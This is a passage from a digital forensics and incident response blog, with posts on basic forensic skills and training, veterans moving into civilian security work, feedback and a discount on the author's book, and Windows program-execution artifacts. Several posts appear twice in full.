What constitutes "properly"? The terms "forensics" and "evidence" bring a legal perspective to the forefront in discussions on this topic, and while I fully believe that there should be one standard to which we all strive to operate, the simple fact is that business processes and requirements very often prevent us from relying on one single standard. While it would be great to be able to cleanly shut a system down and extract the hard drive(s) for acquisition, there are plenty of times we cannot do so. I've seen systems with RAID configurations shut down and the individual drives acquired, but the order of the drives and the RAID configuration itself was never documented; as such, we had all those disk images that were useless. On the other hand, I've acquired images from live systems with USB 1.0 connections by mapping a drive (an ext HDD) to another system on the network that had USB 2.0 connections.
I think we can all agree that we won't always have the perfect, isolated, "clean room-ish" setting for acquiring data or 'evidence'. Yes, it would be nice to have hard drives removed from systems, and be able to have one verified/validated method for imaging that data, but that's not always going to be the case.
Live, bare-metal systems do not have a "hard drive" for memory, and memory acquisition inherently requires the addition of software, which modifies the contents of memory itself.
I have never done mobile forensics but I'm sure that there are instances, or even just specific handsets, where an analyst cannot simply shut the handset down and acquire a complete image of the device.
I would suggest that rather than simply "collect the evidence properly", we lean toward understanding how evidence can be collected (that one size does not fit all), and that the collection process must be thoroughly documented.
2. image the hard drive
Great point with respect to collection...but what if "the hard drive" isn't the issue? What if it's memory? Or a SIM card? See my thoughts on #1.
3. verify the tool that did the imaging, and then verify the image taken
I get that the point here is the integrity of the imaging process itself, as well as maintaining and verifying the integrity of the acquired image. However, if your only option for collecting data is to acquire it from a live system, and you cannot acquire a complete copy of the data, can we agree that what is important here is (a) documentation, and (b) understanding image integrity as it applies to the process being used (and documented)?
For items 1 thru 3, can we combine them into understanding how evidence or data can be collected, techniques for doing so, and that all processes must be thoroughly documented?
4. know what sort of analysis is required even if they don't know how to do it (i.e. can form a hypothesis)
Knowing what sort of analysis is required is predicated by understanding the goals of the acquisition and analysis process. What you are attempting to achieve predicates and informs your acquisition process (i.e., what data/evidence will you seek to acquire)
5. document all their process, analysis and findings
Documentation is the key to all of this, and as such, I am of the opinion that it needs to be addressed very early in the process, as well as throughout the process.
6. can write a report and communicate that report to a technical and non-technical audience.
If you've followed the #DFIR industry for any period of time, you'll see that there are varying opinions as to how reporting should be done. I've included my thoughts as to report writing both here in this blog, as well as in one of my books (i.e., ch 9 of WFA 4/e). While the concepts and techniques for writing DFIR reports may remain fairly consistent across the industry, I know that a lot of folks have asked for templates, and those may vary based on personal preference, etc.
All of that being said, I'm in agreement with Brett, with respect to determining a basic skill set that can be used to identify a "Basic DF Practitioner". From there, one would branch off to different specialties (OS- or platform-specific), likely with different levels (i.e., MacOSX practitioner level 1, MacOSX analyst level 1, etc.)
As such, my thoughts on identifying and developing basic skills in practitioners include:
1. Basic Concepts
Some of the basic concepts for the industry (IMHO) include documentation, writing from an analytic standpoint (exercises), reviewing other's work and having your work reviewed, etc.
For a training/educational program, I'd highly recommend exercises that follow a building block approach. For example, start by having students document something that they did over the weekend; say, attending an event or going to a restaurant or movie. Have them document what they did, then share it, giving them the opportunity to begin speaking in public. Then have them trade their documentation with someone else in the class, and have that person attempt to complete the same task, based on the documentation. Then, that person reviews the "work product", providing feedback.
Another approach is to give the students a goal, or set of goals, and have them develop a plan for achieving the goals. Have them implement the plan, or trade plans such that someone else has to implement the plan. Then conduct a "lessons learned" review; what went well, what could have gone better, and what did we learn from this that we can use in the future?
This is where the building blocks start. From here, provide reading materials for with the students provide reviews, and instead of having the instructor/teacher read them all, have the students share the reviews with other students. This may be a good way to begin building the necessary foundation for the industry.
2. Understanding File Systems and Structures
This area is intended to develop an understanding of how data is maintained on storage systems, and is intended to cover the most common formats, from a high level. For example (and this is just an example):
MacOSX - HPFS, HFS+, file structures such as plists
Linux - ext3/4
Windows - NTFS, perhaps some basic file structures (OLE, Registry)
Depending on the amount of information and the depth into which the instructor/teacher can go, the above list might be trimmed down, or include Android, network packets, common database formats (i.e., SQLite), etc.
Students can then get much more technically in-depth as they progress into their areas of specialization, or into a further level as "practitioner", before they specialize.
Just a note on "specialization" - this doesn't mean that anyone is pigeon-holed into one area; rather, it refers to the training. This means that skill sets are identified, training is provided, and skills are achieved and measured such that they can be documented. In this way, someone that achieves "MacOSX analyst level 2" is known to have completed training and passed testing for a specific set of skills that they can then demonstrate. The same would true with other specialized areas.
3. Data Acquisition and Integrity
The next phase might be one in which basic techniques for data acquisition are understood. I can see this as being a fantastic area for "fam fires"; that is, opportunities for the students to get hands-on time with various techniques. Some of these, such as using write blockers, etc., should be done in the classroom, particularly at the early stages.
In this class, you could also get into memory acquisition techniques, with homework assignments to collect memory from systems using various techniques, documenting the entire process. Then students will provide their "reports" to other students to review. This provides other opportunities for evaluation, as well; for example, have a student with, say, a Mac system provide their documentation to another student with a Mac, and see if the process returns similar results.
We want to be sure that some other very important topics are not skipped, such a acquiring logs, network captures (full packet captures vs. netflow), etc. Again, this should be a high-level understanding, with familiarization exercises, and full/complete documentation.
4. Techniques of Analysis
I think that beginning this topic as part of the basic skill set is not only important, but a good segue into areas of specialization. This is a great place to reiterate the foundational concepts; determine goals, develop a plan, document throughout, and conduct a review (i.e., "lessons learned"). With some basic labs and skills development exercises, an instructor can begin including things such as how those "lessons learned" might be implemented. For example, a Yara rule, or a grep statement for parsing logs or packet captures. But again, this is high-level, so detailed/expert knowledge of writing a Yara rule or grep expression isn't required; the fact that one can learn from experiences, and share that knowledge with others should be the point.
Again, this is mostly high-level, and a great way to maximize the time might be to have students get into groups and pick or be assigned a project. The delivery of the project should include a presentation of the goals, conduct of the project, lessons learned, and a review from the other groups.
What needs to be common throughout the courses is the building block approach, with foundations being built upon and skills developed over time.
As far as skill development goes, somethings I've learned over time include:
We all learn different ways. Some learn through auditory means, others visually, and others by doing. Yes, at a young age, I sat in a classroom and heard how to put on MOPP NBC protective gear. However, I really learned by going out to the field and doing it, and I learned even more about the equipment by having to move through thick bush, wearing all of equipment, in Quantico, in July.
I once worked for a CIO who said that our analysts needed to be able to pick up a basic skill through reading books, etc., as we just could not afford to send everyone to intro-level training for everything. I thought that made perfect sense. When I got to a larger team, there were analysts who came right out and said that they could not learn something new unless they were sitting in a classroom and someone was teaching it to them. At first, I was aghast...but then I realized that what they were saying was that, during the normal work day, there were too many other things going on...booking travel, submitting expenses, performing analysis and report writing...such that they didn't feel that they had the time to learn anything. Being in a room with an instructor took them out of the day-to-day chaos, allowed them to focus on that topic, to understand, and ask questions. Well, that's the theory, anyway. ;-)
We begin learning a new skill by developing a foundational understanding, and then practicing the skill based on repeating a "recipe". Initial learning begins with imitation. In this way, we learn to follow a process, and as our understanding develops, we begin to move into asking questions. This helps us develop a further understanding of the process, from which we can then begin making decisions what new situations arise. However, developing new skills doesn't mean we relinquish old ones, so when a new situation arises, we still have to document our justification for deviation from the process.
Addendum
Some additional thoughts that I had after clicking "publish"...
First, the above "courses" could be part of an overall curriculum, and include other courses, such as programming, etc.
Second, something else that needs to be considered from the very beginning of the program is specificity of language. Things are called specific names, and this provides as means by which we can clearly communicate with other analysts, as well as non-technical people. For example, I've read malware write-ups from vendors, including MS, that state that malware will create a Registry "entry"; well, what kind of entry? A key or a value? Some folks I've worked with in the past have told me that I'm pedantic for saying this, but it makes a difference; a key is not a value, nor vice versa. They each have different structures and properties, and as such, should be referred to as what they are, correctly.
Third, to Brett's point, vendor-specific training has its place, but should not be considered foundational. In 1999, I attended EnCase v3 Intro training; during the course, I was the only person in the room who did not have a gun and a badge. The course was both taught and attended by sworn law enforcement officers. At one point during the training, the instructor briefly mentioned MD5 hashes, and then proceeded on with the material. I asked if he could go back and say a few words about what a hash was and why it was important, and in response, he offered me the honor and opportunity of doing so. My point is the same as Brett's...it's not incumbent upon a vendor to provide foundational training, but that training (and the subsequent knowledge and skills) is, indeed, foundational (or should be) to the industry.
Here is a DFRWS paper that describes a cyber forensics ontology; this is worth consideration when discussing this topic.
Tuesday, November 20, 2018
Basic Skillz
Based on some conversations I've had with Jessica Hyde and others recently (over the past month or so), I've been thinking a good bit lately about what constitutes basic skills in the DFIR field.
Let's narrow it down a bit more...what constitutes "basic skills" in digital forensics?
Looking back at my own experiences, particularly the military, there was a pretty clear understanding of what constitutes "basic skills". The Marines have a motto; "every Marine a rifleman", which essentially states that every Marine must know how to pick up and effectively operate a service rifle, be it the M-16 or M-4. Boot camp (for enlisted Marines) is centered around a core understanding around what it means to be a "basic Marine", and the same holds true for TBS for officers (both commissioned and warrant). From each facility, Marines head off to specialized training in their military occupational specialty (MOS).
Is something like this an effective model for DF? If so, what constitutes "basic skills"? What is the point where someone with those basic skills transitions to an area of specialty, such as, say, Windows forensics, or Mac or mobile forensics?
Thoughts?
Let's narrow it down a bit more...what constitutes "basic skills" in digital forensics?
Looking back at my own experiences, particularly the military, there was a pretty clear understanding of what constitutes "basic skills". The Marines have a motto; "every Marine a rifleman", which essentially states that every Marine must know how to pick up and effectively operate a service rifle, be it the M-16 or M-4. Boot camp (for enlisted Marines) is centered around a core understanding around what it means to be a "basic Marine", and the same holds true for TBS for officers (both commissioned and warrant). From each facility, Marines head off to specialized training in their military occupational specialty (MOS).
Is something like this an effective model for DF? If so, what constitutes "basic skills"? What is the point where someone with those basic skills transitions to an area of specialty, such as, say, Windows forensics, or Mac or mobile forensics?
Thoughts?
Saturday, November 17, 2018
Veteran Skillz
I had an interesting chat recently with a fellow Marine vet recently which generated some thoughts regarding non-technical skills that veterans bring to bear, in any environment. This is something I've thought about before, and following the exchange, I thought it was time to put together a blog post.
Before I start, however, I want to state emphatically and be very clear that this is not an "us vs them" blog post. I'm fully aware that a lot of non-vets may have many of the same skills and experiences discussed in the post, and I'm not suggesting that they don't. More than anything, the goal of this blog post is to help vets themselves overcome at least a modicum of the "imposter syndrome" they may be feeling as they begin their transition from the military to the civilian community.
The military includes some quality technical skills training, and a great thing about the military is that they'll teach you a skill, and then make you to use it. This includes the entire spectrum of jobs...machine gunner, truck driver, welder, etc. While the technical skills imparted by the military, for the most part, may not seem up to par with respect to the private sector, there are a lot of soft skills that are part of military training that are not as prevalent out in the private sector.
Vets also develop some pretty significant technical skill sets, either as part of or ancillary to their roles in the military. When I was on active duty and went to graduate school, I did things outside of work like upgrade my desktop by adding a new hard drive which, back in '94, was not the most straightforward process if you've never done it before. I knew an infantry officer who showed up and had not only installed Linux on his 386 desktop computer, but had already developed a familiarity with the OS...again, not something to shake a stick at back in the mid-'90s. I developed more than a passing familiarity with OS/2 Warp. Prior to that, I had some pretty inventive enlisted Marines working for me; one developed a field expedient antenna that he called a "cobra-head", and he carried around in an old calculator pouch. Another Marine discovered a discrepancy in the "Math for Marines" MCI correspondence course exam; he wrote it up, I edited it and had him sign it, and he got the award. After all, he found it. My point is that I've spoken with a number of vets who've been reticent to take that big step out into the private sector, instead opting for a "soft" transition by working for a contractor or in LE first. I think that some of this has been due to the misconception of, "I won't measure up", but honestly, nothing could be further from the truth.
For vets, the skills you have may be more sought after than you realize. For example, if you spent some time in the military, you have some pretty significant life experiences that non-vets may not have, like living and working with a diverse team. Spent six years in the Navy, with a good bit of that on ship or on a submarine? If you spent any time in the military, you very likely spent time living in a barracks environment, and it's also very likely that you spent time having to be responsible for yourself. As such, when you're transitioning to the private sector, you've already learned a lot of the lessons that others may not yet have experienced.
One notable example that I've heard mentioned by others is being part of a team. What does this mean? One fellow vet said that he has, "...a strong sense of not being the guy that screws over my teammates." He further shared that he'll do whatever it takes to ensure that he doesn't make someone else's job tougher or needlessly burdensome.
There are also a number of little things...how often have you been on a conference call when someone spends a minute responding, but they're still on mute? Or they have some serious racket going on in the background, and they won't go on mute?
Other examples include planning and communications. Like many, I took a class on public speaking while I was in college (it was a requirement), but my real experience with direct communications to others came while I was in the military, beginning in Officer Candidate School (OCS, which is an evaluation process, not a training one). During OCS, we had an evolution called "impromptu speech", where the platoon commander gave us 15 min to prepare a 5 min speech, and we were evaluated (in front of everyone) on both the content and conduct (i.e., did we finish on time, etc.) of the "speech". Each of us got direct feedback as to such things as, did we follow instructions and stay on point, did we stay within the time limit, were we engaging, etc. We then had multiple evolutions (military speak for "periods of training") throughout the rest of OCS where we had to use those skills; briefing three other candidates on fire team movement, briefing 12 other candidates on squad movement, the Leadership Reaction Course, etc. For each evolution, we were evaluated on our ability to come up with a plan, take input and feedback, and then clearly and concisely communicate our plan to others. And when I say we were "evaluated", I mean exactly that. I still remember the feedback I received from the Captain manning the station of the Leadership Reaction Course where I was the team leader. This sort of evolution (along with performance evaluation) continued on into initial officer training (for Marines, The Basic School, or "TBS"); however, there was no intro or basic "impromptu speech" evolution, it just picked up where OCS left off. Not only were we evaluated and critiqued by senior officers, but we also received feedback from our fellow student officers.
My point is that there were experiences that developed basic skills that many of us don't really think about, but they have a pretty significant impact on your value once you transition out of the military. For enlisted folks, did you ever have to guide a new person through the wickets of "how we do things here"? Were you ever in the field somewhere and told by your squad leader that you had to give a training class to fill a block of time, and then evaluated on how you did? Were you ever in a role where you had to give or elicit feedback? You may think that these were small, meaningless experiences, but to be quite honest, they add up and put you head and shoulders above someone with the same technical skills, but hasn't experienced those same sorts of events during their career to that point.
Like others, I've also experienced prejudice against members of the armed forces. I'm not sharing this to diminish or minimize anyone else's experiences; rather, I'm simply sharing one of my own experiences. Years ago (at the time of this writing, close to 20), I worked for a services company in VA, for which the security division was run out of the office in CA. Not long after I started, I was told that I needed to fly to the CA office to get trained up on how things were done, and that I would be there for three days. So, I flew out, and spent the first day and a half chatting with the tech writer in the office, who was also a Marine vet. That's right...after all the discussion and planning, I showed up and nothing happened. When things finally got kicked off, the Director of Security Services stated emphatically that, had I applied to the company through his office that I wouldn't have been hired, for no other reason that because I was coming from the military. Apparently, his feeling was that military folks couldn't think the way civilian security folks thought, that we're too "lock-step".
While he was saying this, he was also giving me a tour of the facilities in the local office. Part of the tour included a room that he described as a "Faraday cage". While we were in the room, with the door closed, his cell phone rang. Evidently, it was NOT someone calling him (in the "Faraday cage") to remind him that, per my resume, I had earned an MSEE degree prior to leaving the military. In fact, I knew what a "Faraday cage" was supposed to be from my undergrad schooling. So...yeah.
My point is, don't put someone on a pedestal due to some minimized sense of self-worth, or some self-inflicted sense of awe in them. After all, we all knew that Colonel or 1stSgt who really shouldn't have been in their position. Realize that there are things you do bring to the table that may not be written into the job description, or even be on the forefront of the hiring manager's mind. However, those skills that you have based simply on what you've experienced will make you an incredibly valuable asset to someone.
For the vets out there who may be feeling anxious or reticence about their impending transition...don't. Remember how you hated staying late to clean weapons, but you adjusted your attitude and focused on getting it done...and not just your weapon, but once you were finished, you went and helped someone else? Remember all those times when the trucks were late picking you and your team up, and how you developed patience because of those experiences? Remember how you also looked to those experiences, and thought about all the steps you'd take to ensure that they didn't happen on your watch, when you were in charge? Well, remember those times and those feelings while you're interviewing, and then reach out and extend a helping hand to the next vet trying to do the same thing you did.
Before I start, however, I want to state emphatically and be very clear that this is not an "us vs them" blog post. I'm fully aware that a lot of non-vets may have many of the same skills and experiences discussed in the post, and I'm not suggesting that they don't. More than anything, the goal of this blog post is to help vets themselves overcome at least a modicum of the "imposter syndrome" they may be feeling as they begin their transition from the military to the civilian community.
The military includes some quality technical skills training, and a great thing about the military is that they'll teach you a skill, and then make you to use it. This includes the entire spectrum of jobs...machine gunner, truck driver, welder, etc. While the technical skills imparted by the military, for the most part, may not seem up to par with respect to the private sector, there are a lot of soft skills that are part of military training that are not as prevalent out in the private sector.
Vets also develop some pretty significant technical skill sets, either as part of or ancillary to their roles in the military. When I was on active duty and went to graduate school, I did things outside of work like upgrade my desktop by adding a new hard drive which, back in '94, was not the most straightforward process if you've never done it before. I knew an infantry officer who showed up and had not only installed Linux on his 386 desktop computer, but had already developed a familiarity with the OS...again, not something to shake a stick at back in the mid-'90s. I developed more than a passing familiarity with OS/2 Warp. Prior to that, I had some pretty inventive enlisted Marines working for me; one developed a field expedient antenna that he called a "cobra-head", and he carried around in an old calculator pouch. Another Marine discovered a discrepancy in the "Math for Marines" MCI correspondence course exam; he wrote it up, I edited it and had him sign it, and he got the award. After all, he found it. My point is that I've spoken with a number of vets who've been reticent to take that big step out into the private sector, instead opting for a "soft" transition by working for a contractor or in LE first. I think that some of this has been due to the misconception of, "I won't measure up", but honestly, nothing could be further from the truth.
For vets, the skills you have may be more sought after than you realize. For example, if you spent some time in the military, you have some pretty significant life experiences that non-vets may not have, like living and working with a diverse team. Spent six years in the Navy, with a good bit of that on ship or on a submarine? If you spent any time in the military, you very likely spent time living in a barracks environment, and it's also very likely that you spent time having to be responsible for yourself. As such, when you're transitioning to the private sector, you've already learned a lot of the lessons that others may not yet have experienced.
One notable example that I've heard mentioned by others is being part of a team. What does this mean? One fellow vet said that he has, "...a strong sense of not being the guy that screws over my teammates." He further shared that he'll do whatever it takes to ensure that he doesn't make someone else's job tougher or needlessly burdensome.
There are also a number of little things...how often have you been on a conference call when someone spends a minute responding, but they're still on mute? Or they have some serious racket going on in the background, and they won't go on mute?
Other examples include planning and communications. Like many, I took a class on public speaking while I was in college (it was a requirement), but my real experience with direct communications to others came while I was in the military, beginning in Officer Candidate School (OCS, which is an evaluation process, not a training one). During OCS, we had an evolution called "impromptu speech", where the platoon commander gave us 15 min to prepare a 5 min speech, and we were evaluated (in front of everyone) on both the content and conduct (i.e., did we finish on time, etc.) of the "speech". Each of us got direct feedback as to such things as, did we follow instructions and stay on point, did we stay within the time limit, were we engaging, etc. We then had multiple evolutions (military speak for "periods of training") throughout the rest of OCS where we had to use those skills; briefing three other candidates on fire team movement, briefing 12 other candidates on squad movement, the Leadership Reaction Course, etc. For each evolution, we were evaluated on our ability to come up with a plan, take input and feedback, and then clearly and concisely communicate our plan to others. And when I say we were "evaluated", I mean exactly that. I still remember the feedback I received from the Captain manning the station of the Leadership Reaction Course where I was the team leader. This sort of evolution (along with performance evaluation) continued on into initial officer training (for Marines, The Basic School, or "TBS"); however, there was no intro or basic "impromptu speech" evolution, it just picked up where OCS left off. Not only were we evaluated and critiqued by senior officers, but we also received feedback from our fellow student officers.
My point is that there were experiences that developed basic skills that many of us don't really think about, but they have a pretty significant impact on your value once you transition out of the military. For enlisted folks, did you ever have to guide a new person through the wickets of "how we do things here"? Were you ever in the field somewhere and told by your squad leader that you had to give a training class to fill a block of time, and then evaluated on how you did? Were you ever in a role where you had to give or elicit feedback? You may think that these were small, meaningless experiences, but to be quite honest, they add up and put you head and shoulders above someone with the same technical skills, but hasn't experienced those same sorts of events during their career to that point.
Like others, I've also experienced prejudice against members of the armed forces. I'm not sharing this to diminish or minimize anyone else's experiences; rather, I'm simply sharing one of my own experiences. Years ago (at the time of this writing, close to 20), I worked for a services company in VA, for which the security division was run out of the office in CA. Not long after I started, I was told that I needed to fly to the CA office to get trained up on how things were done, and that I would be there for three days. So, I flew out, and spent the first day and a half chatting with the tech writer in the office, who was also a Marine vet. That's right...after all the discussion and planning, I showed up and nothing happened. When things finally got kicked off, the Director of Security Services stated emphatically that, had I applied to the company through his office that I wouldn't have been hired, for no other reason that because I was coming from the military. Apparently, his feeling was that military folks couldn't think the way civilian security folks thought, that we're too "lock-step".
While he was saying this, he was also giving me a tour of the facilities in the local office. Part of the tour included a room that he described as a "Faraday cage". While we were in the room, with the door closed, his cell phone rang. Evidently, it was NOT someone calling him (in the "Faraday cage") to remind him that, per my resume, I had earned an MSEE degree prior to leaving the military. In fact, I knew what a "Faraday cage" was supposed to be from my undergrad schooling. So...yeah.
My point is, don't put someone on a pedestal due to some minimized sense of self-worth, or some self-inflicted sense of awe in them. After all, we all knew that Colonel or 1stSgt who really shouldn't have been in their position. Realize that there are things you do bring to the table that may not be written into the job description, or even be on the forefront of the hiring manager's mind. However, those skills that you have based simply on what you've experienced will make you an incredibly valuable asset to someone.
For the vets out there who may be feeling anxious or reticence about their impending transition...don't. Remember how you hated staying late to clean weapons, but you adjusted your attitude and focused on getting it done...and not just your weapon, but once you were finished, you went and helped someone else? Remember all those times when the trucks were late picking you and your team up, and how you developed patience because of those experiences? Remember how you also looked to those experiences, and thought about all the steps you'd take to ensure that they didn't happen on your watch, when you were in charge? Well, remember those times and those feelings while you're interviewing, and then reach out and extend a helping hand to the next vet trying to do the same thing you did.
Tuesday, October 30, 2018
More Regarding IWS
IWS has been out for a short while now, and there have been a couple of reviews posted. So far, it seems that there is some reticence to the book, based on the form factor (size), as well as the price point. Thanks to feedback on the book on that subject from Jessica Hyde, the publisher graciously shared the following with me:
I’m happy to pass on a discount code that Jessica and her students, and anyone else you run across, can use on our website (www.elsevier.com) for a 30% discount AND we always offer free shipping. The discount code is: FOREN318.
Hopefully, this discount code will bring more readers and DFIR analysts a step closer to the book. I think that perhaps the next step is to address the content itself. I'm very thankful to Brett Shavers for agreeing to let me share this quote from an email he sent me regarding the IWS content:
As to content, I did a once-over to get a handle of what the book is about, now on Ch 2, and so far I think this is exactly how I want every DFIR book to be written.
I added the emphasis myself. This book is something of a radical departure from my previous books, which I modeled after other books I'd seen in the genre, because that's what I thought folks wanted to see. Mention an artifact, provide a description of what the artifact may mean (depending upon the investigation), maybe a general description of how that artifact may be used, and then provide names of a couple of tools to parse the artifact. After that, move on to the next artifact, and in the end, pretty much leave it to the reader to string everything together into an "investigation". In this case, my thought process was to use images that were available online to run through an investigation, providing analysis decisions and pivot points along the way. This way, a reader could follow along, if they chose to do so.
If you get a copy of the book and have a similar reaction to what Brett shared, please let me know. If there's something that you like or don't like about the book, again, please let me know. Do this through an email, a comment here on this blog, or a blog post of your own. As illustrated by the example involving Jessica, if I know about something, I can take action and work to change it.
How It Works
When a publisher decides to go forward with a book project, they have the author submit a prospectus describing the book, the market for the book, and any challenges that may be faced in the market; in short, the publisher has the author do the market research. The prospectus is then reviewed by several folks; for the book projects I've been involved with, its usually been three people in the industry. If the general responses are positive, the publisher will move forward with the project.
I'm sharing this with you because, in my experience, there are two things that the publisher looks at when considering a second edition; sales numbers and feedback from the first edition. As such, if you like the content of the book and your thoughts are similar to Brett's, let me know. Write a review on Amazon or on the Elsevier site, write your own blog post, or send me an email. Let me know what you think, so that I can let the publisher know, and so that I can make the changes or updates, particularly if they're consistent across several reviewers.
If you teach DFIR, and find value in the book content, but would like to see something more, or something different, let me know. As with Jessica's example, there's nothing anyone can to do take action if they don't know what you're thinking.
I’m happy to pass on a discount code that Jessica and her students, and anyone else you run across, can use on our website (www.elsevier.com) for a 30% discount AND we always offer free shipping. The discount code is: FOREN318.
Hopefully, this discount code will bring more readers and DFIR analysts a step closer to the book. I think that perhaps the next step is to address the content itself. I'm very thankful to Brett Shavers for agreeing to let me share this quote from an email he sent me regarding the IWS content:
As to content, I did a once-over to get a handle of what the book is about, now on Ch 2, and so far I think this is exactly how I want every DFIR book to be written.
I added the emphasis myself. This book is something of a radical departure from my previous books, which I modeled after other books I'd seen in the genre, because that's what I thought folks wanted to see. Mention an artifact, provide a description of what the artifact may mean (depending upon the investigation), maybe a general description of how that artifact may be used, and then provide names of a couple of tools to parse the artifact. After that, move on to the next artifact, and in the end, pretty much leave it to the reader to string everything together into an "investigation". In this case, my thought process was to use images that were available online to run through an investigation, providing analysis decisions and pivot points along the way. This way, a reader could follow along, if they chose to do so.
If you get a copy of the book and have a similar reaction to what Brett shared, please let me know. If there's something that you like or don't like about the book, again, please let me know. Do this through an email, a comment here on this blog, or a blog post of your own. As illustrated by the example involving Jessica, if I know about something, I can take action and work to change it.
How It Works
When a publisher decides to go forward with a book project, they have the author submit a prospectus describing the book, the market for the book, and any challenges that may be faced in the market; in short, the publisher has the author do the market research. The prospectus is then reviewed by several folks; for the book projects I've been involved with, its usually been three people in the industry. If the general responses are positive, the publisher will move forward with the project.
I'm sharing this with you because, in my experience, there are two things that the publisher looks at when considering a second edition; sales numbers and feedback from the first edition. As such, if you like the content of the book and your thoughts are similar to Brett's, let me know. Write a review on Amazon or on the Elsevier site, write your own blog post, or send me an email. Let me know what you think, so that I can let the publisher know, and so that I can make the changes or updates, particularly if they're consistent across several reviewers.
If you teach DFIR, and find value in the book content, but would like to see something more, or something different, let me know. As with Jessica's example, there's nothing anyone can to do take action if they don't know what you're thinking.
Sunday, October 28, 2018
Updates
Book Discount
While I was attending OSDFCon, I had a chance to (finally!) meet and speak with Jessica Hyde, a very smart and knowledgeable person, former Marine, and an all-around very nice lady. As part of the conversation, she shared with me some of her thoughts regarding IWS, which is something I sincerely hope she shares with the community. One of her comments regarding the book was that the price point put it out of reach for many of her students; I shared that with the publisher, and received the following as a response:
I’m happy to pass on a discount code that Jessica and her students, and anyone else you run across, can use on our website (www.elsevier.com) for a 30% discount AND we always offer free shipping. The discount code is: FOREN318.
What this demonstrates is that if you have a question, thought, or comment, share it. If action needs to or can be taken, someone will do so. In this case, my concern is the value of the book content to the community, and Jessica graciously shared her thoughts with me, and as a result, I did what I could to try and bring the book closer to where others might have an easier time purchasing it.
So how can you share your thoughts? Write a blog post or an email. Write a review of the book, and specify what you'd like to see. What did you find good, useful or valuable about the book content, and what didn't you like? Write a review and post it to the Amazon page for the book, or to the Elsevier page; both pages provide a facility for posting a review.
Artifacts of Program Execution
Adam recently posted a very comprehensive list of artifacts indicative of program execution, in a manner similar to many other blogs and even books, including my own. A couple of take-aways from this list include:
- Things keep changing with Windows systems. Even as far back as Windows XP, there were differences in artifacts, depending upon the Service Pack. In the case of the Shim Cache data, there were differences in data available on 32-bit and 64-bit systems. More recently, artifacts have changed between updates to Windows 10.
- While Adam did a great job of listing the artifacts, something analysts need to consider is the context available from viewing multiple artifacts together, as a cluster, as you would in a timeline. For example, let's say there's an issue where when and how Defrag was executed is critical; creating a timeline using the user's UserAssist entries, the timestamps available in the Application Prefetch file, and the contents of the Task Scheduler Event Log can provide a great deal of context to the analyst. Do not view the artifacts in isolation; seek to use an analysis methodology that allows you to see the artifacts in clusters, for context. This also helps in spotting attempts by an adversary to impede analysis.
So, take-aways...know the version of Windows you're working with because it is important, particularly when you ask questions, or seek assistance. Also, seek assistance. And don't view artifacts in isolation.
Artifacts and Evidence
A while back (6 1/2 yrs ago), I wrote about indirect and secondary artifacts, and included a discussion of the subject in WFA 3/e.
Chris Sanders recently posted some thoughts regarding evidence intention, which seemed to me to be along the same thought process. Chris differentiates intentional evidence (i.e., evidence generated to attest to an event) from unintentional evidence (i.e., evidence created as a byproduct of some non-attestation function).
Towards the end of the blog post, Chris lists six characteristics of unintentional evidence, all of which are true. To his point, not only may some unintentional evidence have multiple names, it may be called different things by the uninitiated, or those who (for whatever reason) choose to not follow convention or common practice. Consider NTFS alternate data streams, as an example. In my early days of researching this topic, I found that MS themselves referred to this artifact as both "alternate" and "multiple" data streams.
Some other things to consider, as well...yes, unintentional evidence artifacts often are quirky and have exceptions, which means they are very often misunderstood and misinterpreted. Consider the example of Shim Cache entry from Chris's blog post; in my experience, this is perhaps the most commonly misinterpreted artifact to date, for the simple fact that the time stamps are commonly referred to as the "date of execution". Another aspect of this artifact is that it's taken as standalone, and should not be...there may be evidence of time stomping occurring prior to the file being included as a Shim Cache record.
Finally, Chris is absolutely correct that many of these artifacts have poor documentation, if they have any at all. I see this as a short-coming of the community, not of the vendor. The simple fact is that, as a community, we're so busy pushing ahead that we aren't stopping to consider the value to the community as a whole that we're leaving behind. Yes, the vendor may poorly document an artifact, or the documentation may simply be part of the source code that we cannot see, but what we're not doing as a community is documenting and sharing our findings. There've been too many instances during my years doing DFIR work that I would share something with someone who would respond with, "oh, yeah...we've seen that before" only to have no documentation, not even a Notepad document or something scribbled on a napkin to which they can refer me. This is a loss for everyone.
While I was attending OSDFCon, I had a chance to (finally!) meet and speak with Jessica Hyde, a very smart and knowledgeable person, former Marine, and an all-around very nice lady. As part of the conversation, she shared with me some of her thoughts regarding IWS, which is something I sincerely hope she shares with the community. One of her comments regarding the book was that the price point put it out of reach for many of her students; I shared that with the publisher, and received the following as a response:
I’m happy to pass on a discount code that Jessica and her students, and anyone else you run across, can use on our website (www.elsevier.com) for a 30% discount AND we always offer free shipping. The discount code is: FOREN318.
What this demonstrates is that if you have a question, thought, or comment, share it. If action needs to or can be taken, someone will do so. In this case, my concern is the value of the book content to the community, and Jessica graciously shared her thoughts with me, and as a result, I did what I could to try and bring the book closer to where others might have an easier time purchasing it.
So how can you share your thoughts? Write a blog post or an email. Write a review of the book, and specify what you'd like to see. What did you find good, useful or valuable about the book content, and what didn't you like? Write a review and post it to the Amazon page for the book, or to the Elsevier page; both pages provide a facility for posting a review.
Artifacts of Program Execution
Adam recently posted a very comprehensive list of artifacts indicative of program execution, in a manner similar to many other blogs and even books, including my own. A couple of take-aways from this list include:
- Things keep changing with Windows systems. Even as far back as Windows XP, there were differences in artifacts, depending upon the Service Pack. In the case of the Shim Cache data, there were differences in data available on 32-bit and 64-bit systems. More recently, artifacts have changed between updates to Windows 10.
- While Adam did a great job of listing the artifacts, something analysts need to consider is the context available from viewing multiple artifacts together, as a cluster, as you would in a timeline. For example, let's say there's an issue where when and how Defrag was executed is critical; creating a timeline using the user's UserAssist entries, the timestamps available in the Application Prefetch file, and the contents of the Task Scheduler Event Log can provide a great deal of context to the analyst. Do not view the artifacts in isolation; seek to use an analysis methodology that allows you to see the artifacts in clusters, for context. This also helps in spotting attempts by an adversary to impede analysis.
So, take-aways...know the version of Windows you're working with because it is important, particularly when you ask questions, or seek assistance. Also, seek assistance. And don't view artifacts in isolation.
Artifacts and Evidence
A while back (6 1/2 yrs ago), I wrote about indirect and secondary artifacts, and included a discussion of the subject in WFA 3/e.
Chris Sanders recently posted some thoughts regarding evidence intention, which seemed to me to be along the same thought process. Chris differentiates intentional evidence (i.e., evidence generated to attest to an event) from unintentional evidence (i.e., evidence created as a byproduct of some non-attestation function).
Towards the end of the blog post, Chris lists six characteristics of unintentional evidence, all of which are true. To his point, not only may some unintentional evidence have multiple names, it may be called different things by the uninitiated, or those who (for whatever reason) choose to not follow convention or common practice. Consider NTFS alternate data streams, as an example. In my early days of researching this topic, I found that MS themselves referred to this artifact as both "alternate" and "multiple" data streams.
